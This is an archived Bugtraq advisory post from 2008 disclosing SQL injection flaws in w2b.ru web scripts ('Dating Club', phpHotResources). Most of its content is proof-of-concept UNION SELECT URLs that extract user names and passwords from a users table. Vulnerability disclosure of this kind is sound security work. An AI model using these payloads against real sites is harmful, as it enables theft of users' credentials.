Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: w2b.ru multiple products SQL Injection

w2b.ru multiple products SQL Injection

From: <noreply_at_aria-security.com>
Date: 10 Apr 2008 21:18:18 -0000
('binary' encoding is not supported, stored as-is)  -------------------------------------------------------
| Aria-Security Team (Persian Security Network) |
| http://Aria-Security.com (For English) |
| http://Aria-Security.net (For Farsi) |
| Greetz: |
| AurA, NULL, Kinglet, t3rr0r1st, Moromort |
| and to all of our staff |
| Discovered by The-0utl4w |
 -------------------------------------------------------
Original Advisort

Vendor: http://w2b.ru
Affected Script: "Dating Club"

PoC
browse.php?mode=browsebyCat&_gender=0&age_from=15&age_to=-4214/**/union/**/select/**/1,user_name,password,4,5,6,7,8/**/from/**/users/*&country=&state=&field=body

Other product have the same problems.
Example
phpHotResources: cat.php?lang=4&kind=-4214+union+select+1,user_name,password,4,5,6,7,8,9+from+users/* (this syntax mite not work but there's sql injection!)

Original link: http://forum.aria-security.com/showthread.php?p=70

Regards,
The-0utl4w
Received on Apr 11 2008

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos